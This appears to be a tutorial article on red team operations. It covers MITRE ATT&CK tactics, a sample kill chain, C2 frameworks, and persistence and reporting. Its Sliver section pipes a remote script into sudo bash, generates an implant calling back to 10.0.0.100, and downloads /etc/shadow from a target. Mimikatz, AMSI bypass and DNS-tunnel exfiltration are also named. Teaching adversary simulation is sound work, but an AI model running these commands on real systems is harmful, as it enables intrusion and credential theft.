1. Red Team vs Penetration Test
Pentest vs Red Team:
Pentest Red Team
────────────────────────────────────────────────────
Goal: Find vulns Test detection
Scope: Defined targets Broader scope
Duration: 1-4 weeks 2-6 months
Stealth: Not required Essential
Rules: Strict ROE Flexible
Reporting: Vuln list + remediation TTPs used + gaps
Blue Team: Usually aware Usually NOT aware
Success: # vulns found Objectives achieved
Focus: Technical weaknesses People+Process+Tech
Red Team Objectives (examples):
├── Gain domain admin access
├── Access customer PII database
├── Exfiltrate financial data
├── Compromise CI/CD pipeline
└── Deploy ransomware simulator
2. MITER ATT&CK Framework
MITRE ATT&CK Tactics (Enterprise):
# │ Tactic │ What
────┼───────────────────────────┼─────────────────────
1 │ Reconnaissance │ Gather info on target
2 │ Resource Development │ Setup infrastructure
3 │ Initial Access │ Get into the network
4 │ Execution │ Run malicious code
5 │ Persistence │ Maintain access
6 │ Privilege Escalation │ Get higher privileges
7 │ Defense Evasion │ Avoid detection
8 │ Credential Access │ Steal credentials
9 │ Discovery │ Map the environment
10 │ Lateral Movement │ Move to other systems
11 │ Collection │ Gather target data
12 │ Command & Control (C2) │ Communicate with implant
13 │ Exfiltration │ Steal data out
14 │ Impact │ Disrupt operations
ATT&CK Navigator — map your red team TTPs:
→ attack.mitre.org/matrices/enterprise/
Red Team Kill Chain (Example):
Phase 1: Reconnaissance (T1593, T1594, T1589)
└── OSINT → identify target employees, tech stack
Phase 2: Initial Access (T1566 — Phishing)
└── Spear-phishing with malicious PDF → macro execution
Phase 3: Execution (T1059 — PowerShell)
└── PowerShell download cradle → implant beacon
Phase 4: Persistence (T1053 — Scheduled Task)
└── Create scheduled task for beacon persistence
Phase 5: Defense Evasion (T1027 — Obfuscation)
└── Encode beacon, AMSI bypass, ETW patching
Phase 6: Credential Access (T1003 — Credential Dump)
└── Mimikatz → dump NTLM hashes, Kerberos tickets
Phase 7: Lateral Movement (T1021 — Remote Services)
└── Pass-the-Hash → move to file server
Phase 8: Collection (T1005 — Local Data)
└── Find sensitive documents on file shares
Phase 9: Exfiltration (T1048 — Alternative Protocol)
└── DNS tunneling to exfiltrate data
3. Command & Control (C2) Frameworks
Popular C2 Frameworks (2026):
Open Source:
├── Sliver : Go-based, modern, mTLS/HTTP/DNS/WG
├── Havoc : Modern C2, BOF support
├── Mythic : Multi-platform, extensible
└── Merlin : HTTP/2, QUIC support
Commercial:
├── Cobalt Strike : Industry standard
└── Brute Ratel : EDR evasion focused
Comparison:
┌──────────────┬────────┬──────┬───────┬──────────┐
│ Feature │ Sliver │Havoc │Mythic │Cobalt St │
├──────────────┼────────┼──────┼───────┼──────────┤
│ Price │ Free │Free │Free │$3,500/yr │
│ Language │ Go │C/C++ │Python │Java │
│ Protocols │ mTLS, │HTTP/ │Multi │HTTP,DNS │
│ │HTTP,DNS│SMB │agent │SMB,TCP │
│ Implant OS │Win/Lin/│Win │Multi │Win/Lin │
│ │Mac │ │ │Mac │
│ BOF Support │ ✅ │ ✅ │ ✅ │ ✅ │
│ EDR Evasion │ Good │Good │Good │Best │
└──────────────┴────────┴──────┴───────┴──────────┘
# --- Sliver C2 — Setup Example ---
# Install Sliver
curl https://sliver.sh/install | sudo bash
# Start Sliver server
sliver-server
# Generate implant
sliver > generate --mtls 10.0.0.100 --os linux --arch amd64 \
--name linux-beacon --save /tmp/implant
# Start listener
sliver > mtls --lhost 10.0.0.100 --lport 8888
# After implant executes on target:
sliver > sessions
sliver > use [SESSION_ID]
# Post-exploitation
sliver (TARGET) > info
sliver (TARGET) > ifconfig
sliver (TARGET) > ps
sliver (TARGET) > download /etc/shadow /tmp/
sliver (TARGET) > shell # Interactive shell
# Pivoting
sliver (TARGET) > pivots tcp --bind 0.0.0.0:9000
# Generate beacon that connects through pivot
4. Initial Access Techniques
Initial Access Vectors:
1. Phishing (T1566):
├── Email with malicious attachment
├── HTML smuggling
├── QR code phishing
└── OAuth token phishing
2. Public-Facing Application (T1190):
├── CVE exploitation
├── Web shell upload
└── API vulnerability abuse
3. External Remote Services (T1133):
├── VPN credential stuffing
├── RDP brute force
└── SSH key theft
4. Supply Chain (T1195):
├── Compromised npm/PyPI packages
├── CI/CD pipeline injection
└── Plugin/extension backdoor
5. Valid Accounts (T1078):
├── Leaked credentials (breaches)
├── Password spraying
└── Credential from previous exploit
Phishing Example — HTML Smuggling:
1. Craft HTML file with embedded payload
2. JavaScript reconstructs binary from base64
3. Auto-download when user opens HTML
4. Bypasses email gateway (no attachment)
5. Persistence & Lateral Movement
Persistence Techniques (T1053, T1136, T1543):
Linux:
├── Cron job: /etc/crontab, /var/spool/cron/
├── Systemd service: /etc/systemd/system/
├── SSH authorized_keys: ~/.ssh/
├── LD_PRELOAD: /etc/ld.so.preload
└── Bashrc/profile: ~/.bashrc
Windows:
├── Registry Run keys
├── Scheduled Tasks
├── WMI Event Subscriptions
├── DLL Search Order Hijacking
└── Startup folder
Cloud:
├── IAM user/key creation
├── Lambda backdoor function
├── OAuth app registration
└── API key generation
Lateral Movement (T1021, T1550):
├── Pass-the-Hash (PtH)
├── Pass-the-Ticket (PtT / Golden Ticket)
├── SSH key reuse
├── Service account abuse
├── Kubernetes pod-to-pod
└── Cloud cross-account role assumption
6. Red Team Reporting
Red Team Report Structure:
1. Executive Summary
├── Objectives vs achievements
├── Overall security posture
└── Key business risks identified
2. Methodology
├── MITRE ATT&CK mapping
├── Timeframe and approach
└── Rules of Engagement summary
3. Attack Narrative (Story format)
├── Day 1-3: Reconnaissance findings
├── Day 4-7: Initial access achieved (how)
├── Day 8-14: Internal pivoting path
├── Day 15-20: Objective achieved (PII accessed)
└── Timeline with ATT&CK technique IDs
4. Detection Gaps
├── What was NOT detected
├── What was detected (and time to detect)
├── SIEM/EDR/NDR coverage gaps
└── SOC process gaps
5. Recommendations
├── Quick wins (1-30 days)
├── Medium term (30-90 days)
└── Long term (90+ days)
6. MITRE ATT&CK Heat Map
└── Visual of techniques used vs detected
7. Summary
- Red Team: Adversary simulation — test detection, not just find vulns
- MITER ATT&CK: Framework mapping TTPs (14 tactics, 200+ techniques)
- C2 Frameworks: Sliver, Havoc, Mythic, Cobalt Strike
- Kill Chain: Recon → Initial Access → Execution → Persistence → Lateral Movement → Exfil
- Reporting: Attack narrative + detection gaps + ATT&CK heat map
The next article will move to Blue Team — Detection Engineering.